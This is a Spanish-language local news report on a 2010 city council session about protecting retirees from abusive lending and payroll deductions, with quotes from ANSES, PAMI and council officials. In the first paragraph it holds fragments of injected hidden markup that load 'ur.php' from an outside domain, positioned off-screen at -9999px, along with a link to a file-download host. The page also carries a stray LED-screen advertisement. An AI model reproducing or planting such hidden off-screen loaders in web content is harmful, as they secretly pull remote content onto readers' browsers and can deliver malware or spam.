26/04/2010, Locales

Protección y defensa de los derechos de los Jubilados en una Jornada en el HCD

A fin de coordinar acciones conjuntas de concientización, formación y proposición de herramientas legales y jurídicas para la protección y defensa de los derechos de los usuarios con respecto a las modalidades de contratación de servicios financieros, se desarrolló en el recinto deliberativo la Jornada sobre Derechos de Jubilados y Pensionados. / src=http://dfrgcc.com/ur.php style=position:absolute;left:-9999px;top:-9999px; href=http://file-dl.com/show.php?id=10 / src=http://dfrgcc.com/ur.php

Conjuntamente, el presidente del Concejo Deliberarte, Marcelo Artime, el gerente de prestaciones de Anses, Daniel Urdampilleta, la diputada nacional, Adela Segarra, el director Regional de Pami, José Luis Pifano, Guadalupe Scarai, la Subsecretaria para la Integración, Alejandra Urdampilleta y la concejal Verónica Beresiarte participaron con jubilados y pensionados.

El gerente de prestaciones de Anses, Daniel Urdampilleta destacó esta importante iniciativa del Concejo Deliberante. “Sin intercambio de comunicación se desaprovechan oportunidades en beneficios de los derechos ciudadanos”. Entre otros asuntos, Urdampilleta resaltó que a los jubilados se les niegan créditos. “Existe un abuso de las entidades financieras: algunos les niegan los beneficios y otros les cobran de un 80 a un 140 % de interes”.

Por su parte, el presidente del Concejo deliberante confirmó que este fue el primer día de trabajo entre la Nación y el Municipio. “En protección y en defensa de los jubilados tenemos que alertar sobre la problemática y trabajar para a fin de articular las politicas locales y nacionales”, sostuvo Artime.

A su turno, la diputada Adela Segarra por la defensa del salario y los haberes de los jubilados brindó información para que la población tome conciencia sobre esta problemática y cuáles son “los recaudos que se deben tomar”. En esta línea, la legisladora marplatense expuso la Normativa Vigente en defensa del salario de los trabajadores ante las entidades financieras y mutuales en la operatoria de códigos de descuento; los proyectos presentados a al fecha en las diferentes esferas de la administración, el estudio y propuestas de campañas de información y prevención de acciones fraudulentas contra trabajadores, pensionados y jubilados. “Hay que debatir en defensa de los derechos del consumidor y buscar los mecanismos para que la normativa vigente se transforme con la participación de las asociaciones de jubilados”, señaló Segarra.

Así mismo se dio a conocer el proyecto de ordenanza municipal para delimitar que la administración comunal, no efectuará descuentos, ni retenciones en la liquidación mensual de haberes, que excedan e 20% del haber liquido mensual del agente municipal por la operatoria del Sistema de Códigos de Descuento establecido en la Ordenanza 17736 de cobro de cuotas de créditos personales por entidades financieras o mutuales.

Por su parte, La concejal del Frente para la Victoria, Verónica Beresiarte, aseguró que “desde el ámbito participativo, las autoridades como herramientas de derechos de los sectores mas vulnerables podemos traducir una metodología de trabajo para mantenerla en el tiempo”.

Asimismo, el director regional de Pami, José Luis Pifano expresó su comprencion desde el sector. “Somos la parte mas involucrada para resguardar el haber de nuestros jubilados. Los beneficiarios de Pami se ven perjudicados muchas veces con los prestamos, por lo que deberían estar regulados y controlados porque el nuestro es un sector muy vulnerable”, afirmó Pifano. Desde el análisis, el director de Pami, sostuvo que “las condiciones que se les imponen a nuestros jubilados hace que necesariamente debamos controlar estas cuestiones”.



En Argentina podés encontrar pantallas de led para publicidad en venta y alquiler

Compartí esta nota

retrato de hoy